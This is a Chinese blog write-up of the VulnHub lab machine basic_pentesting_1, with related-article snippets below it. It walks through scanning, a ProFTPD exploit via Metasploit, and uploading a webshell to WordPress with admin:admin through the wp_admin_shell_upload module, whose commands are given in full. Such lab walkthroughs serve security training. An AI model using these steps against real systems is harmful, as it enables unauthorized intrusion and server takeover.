[Vulnhub] basic_pentesting_1

最新推荐文章于 2024-06-12 12:45:51 发布
最新推荐文章于 2024-06-12 12:45:51 发布
阅读量835 收藏 1
点赞数
分类专栏: vulnhub 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46739058/article/details/124571938
版权

vulnhub靶场地址:Basic Pentesting: 1 ~ VulnHub

使用迅雷下载会快点

参考B站视频:玩转100个vulnhub靶场4----basic_pentesting_1_哔哩哔哩_bilibili

靶场信息:

 和之前一样,主机发现,端口扫描,打开目标网页

 目标网页没有发现可用信息,扫描后台路径

 两种攻击手法:

1、ftp服务版本漏洞

利用MSF,search 服务名

show payloads

 设置一下目标信息 成功返回shell会话

 2、webshell

通过后台路径扫描,发现/secret/wp-admin是wordpress框架的后台登录地址 

 通过的简单的弱口令 admin:admin 就登进去了

通过msf上传webshell

use exploit/unix/webapp/wp_admin_shell_upload

set lhost 192.168.56.133

set rhost 192.168.56.140

set targeturi /secret/

set username admin

set password admin

exploit

 可以看到成功上传了php后门,并获得web权限

 网站权限很小,接下来就是提权,先上传信息收集和漏洞探针工具

进入/tmp,进去shell会话,执行工具,权限不足就chmod命令赋予执行权限。 

 信息收集工具结果就不演示了,来看看漏洞探针工具的结果,发现了很多漏洞。

 下载并上传EXP

emmmm..........漏洞的exp都用了,发现没有什么回馈,所以不得不暂时放下webshell提权的方法(原因是自己菜,各位谅解!),有后续思路的可以评论告知一下如此菜的我。

Dues_D
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BasicPentesting:从TryHackMe清除基本渗透测试室
02-12
基本的沉思 IP: 10.10.251.73 斯坎尼格 开放端口 22 80 139 445 8009 8080 问题与解答 Web服务器上的隐藏目录( development ,可通过GoBuster找到) 用户名(通过enum4linux找到jan和kay ) 密码( jan: armando使用SSH通过Hydra找到) 密码( kay: beeswax在linPEAS中获得带有scalloning的rsa-id后,通过John通过发现的kay: beeswax ) 上一个密码(以下是heresareallystrongpasswordthatfollowsthepasswordpolicy$$在凯氏登录中找到的输入密码heresareallystrongpasswordthatfollowsthepasswordpolicy$$密码) 在ssh服务器中,使用与John一起
Pentesting_Red-Teaming
05-17
Pentesting_Red-Teaming 笔记,提示/技巧/工具/技术的集合,适用于所有渗透测试和团队合作目录页操作系统提示和技巧侦察开发剥削后
Vulnhub靶场渗透-basic_pentesting_1
paidx0
09-22 627
前言 靶机ip(192.168.110.134) 攻击机ip(192.168.110.127) 网络NAT模式 这次的靶场比较简单,却绕了挺大弯的 信息收集 找到隐藏页 简单翻了一下也没啥可以利用的东西,继续扫隐藏页目录 找到一些看似有用其实没啥用的东西,比如WordPress的登录页,文件包含页 这全都是误导,显然我被骗了,一直在爆破登录页和一个一个文件的看,文件数量太多了浪费很多时间 正确解法 重新回到nmap,这次不偷懒,更详细的扫描一下服务的版本号 nmap -A -v 192.168
BASIC-PENTESTING-1 靶机提权
weixin_41082546的博客
08-11 1102
basic-pentesting-1 https://www.vulnhub.com/entry/basic-pentesting-1,216/ 获取ip地址 端口扫描,服务识别 根据服务版本搜索相关漏洞 通过查看漏洞利用代码我们知道该漏洞利用模块在msf中已有 于是使用msf 搜索漏洞模块并利用 use exploit/unix/ftp/proftpd...
basic_pentesting_1靶机渗透
weixin_64809022的博客
06-23 634
Python提权: python3 -c 'import pty;pty.spawn("/bin/bash")'
信息安全_数据安全_Pentesting ICS 102.pdf
08-22
信息安全_数据安全_Pentesting ICS 102 信息保护 网络安全 web安全 网络安全 安全设计
java红酒网站源码-pentesting_Notes:pentesting_Notes
06-05
java网站源码Pentesting Pratic Notes(备忘单) 文件检测和提取器: file targetFile strings targetFile | grep flag strings -o targetFile strings -a targetFile strings -t d targetFile strings -f ...
Pentesting
03-21
渗透测试
靶场练习第五天~vulnhub靶场之basic_pentesting_1
qq_57976347的博客
01-30 708
一、信息收集 1.主机发现 (1)Netdiscover:专用的二层发现工具,拥有主动和被动发现两种方式 具体操作如下,查看一下kali的ip 然后使用命令sudo netdiscover,发现了靶机的ip 2.端口扫描,服务识别 (1)使用nmap -A 开放的端口以及靶场操作系统和版本的探测,使用方法:nmap -A 192.168.101.106 二、后渗透 1.根据服务版本搜索相关漏洞 这里用到msfconsole,关于msfconsole介绍:msfconsole..
LinEnum.zip
08-24
LinEnum是一款在linux系统使用的辅助提权脚本,它能够帮助你找到系统的弱点,从而方便提权。
Vulnhubbasic_pentesting_1
zhangshuaiijie的博客
06-29 148
三个端口,ftp,ssh,http看来突破口不在网站上,那就看看是不是ftp,ssh和apache的问题,nmap扫描版本这个版本正确,而且msf上有。
basic_pentesting1靶机
qq_68865419的博客
10-19 214
这次我们使用一种新方法查看靶机的ipNetdiscover:二层发现工具,拥有主动和被动发现两种方式。首先查看靶机的ip​​​​​​然后查看本机的ip,使用ipconfig然后扫描靶机ip。
靶机渗透测试:basic_pentesting_1靶机提权
x_13579的博客
04-13 693
靶场提权
[Vulnhub] basic_pentesting 2
weixin_63231007的博客
07-12 673
目录信息搜集 S2-052漏洞利用 Hydra爆破jan密码(1) vim读取密码 (2) ssh公钥私钥获取身份登录凭据下载链接:Basic Pentesting: 2 ~ VulnHubnmap -sP 192.168.236.0/24 扫描一下靶机ipnetdiscover -i eth0 -r 192.168.1.0/24靶机ip : 192.168.236.138nmap -A 192.168.236.138 扫描一下靶机的具体信息。 收集靶场环境的服务和端口信息我们可以看见139和4...
vulnhub靶场】​basic_pentesting_2靶机​提权
qq_46421742的博客
08-03 265
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
如何设置渗透测试实验室
2301_77157449的博客
05-04 595
导语:在本文中,我将介绍设置渗透实验室的最快方法。在开始下载和安装之前,必须确保你使用的计算机符合某些渗透测试的要求,这可以确保你可以一次运行多个虚拟机而不会出现任何问题。在本文中,我将介绍设置渗透实验室的最快方法。在开始下载和安装之前,必须确保你使用的计算机符合某些渗透测试的要求,这可以确保你可以一次运行多个虚拟机而不会出现任何问题。确保在BIOS设置中启用了计算机的硬件虚拟化设置,大多数当前的PC应该已启用它,但如果你使用的是较旧的计算机或运行虚拟机时遇到问题,则可能必须启用此设置。
Vulnhub靶机:basic_pentesting_1
qq_48904485的博客
02-29 369
运行环境:Virtualbox攻击机:kali(10.0.2.4)靶机:basic_pentesting_1(10.0.2.6)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/basic-pentesting-1,216/
2024中国网络安全产品用户调查报告(发布版)
最新发布
2301_76786857的博客
06-12 870
本报告正是安在新媒体发起,基于“诸子云社群,以“取之于民,用之于民"的方式,反馈“甲方"眼中的中国网络安全市场情况,为网络安全行业提供来自网络安全企业用户视角的参考。自2020年始,人类进入了21世纪的第二个十年,全球进入了百年未有之大变局,新十年的开始即被新冠疫情逆转了全球化发展的历程,而至2022年3月俄乌战争又突然爆发,紧接着2023年7月“巴以冲突"皱起,世界快速进入动荡中,不确定性激增,网络对抗愈演愈烈,导致中国网络安全市场和环境受到重大影响。
kali linux wifi监听模式,无线渗透教程1:监听无线网络
06-09
好的,我了解您的问题。针对您的问题,我需要说明的是我是一个语言模型,无法进行实际的操作和演示。但是我可以为您提供一些关于Kali Linux的WiFi监听模式和无线渗透方面的知识和资源。 Kali Linux是一款专门用于渗透测试和网络安全的Linux发行版。在Kali Linux中,可以使用一些工具来进行WiFi监听模式和无线渗透测试。其中,常用的工具包括airmon-ng、airodump-ng和aireplay-ng等。 具体的使用方法可以参考一些相关的教程和资源。以下是一些推荐的资源: 1. Kali Linux官方文档:https://docs.kali.org/ 2. Kali Linux渗透测试教程:https://www.kali.org/docs/pentesting/ 3. Kali Linux无线渗透教程:https://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-psk-passwords-using-aircrack-ng-0148366/ 希望以上内容能对您有所帮助。如果您还有其他问题,可以继续提出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Dues_D

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值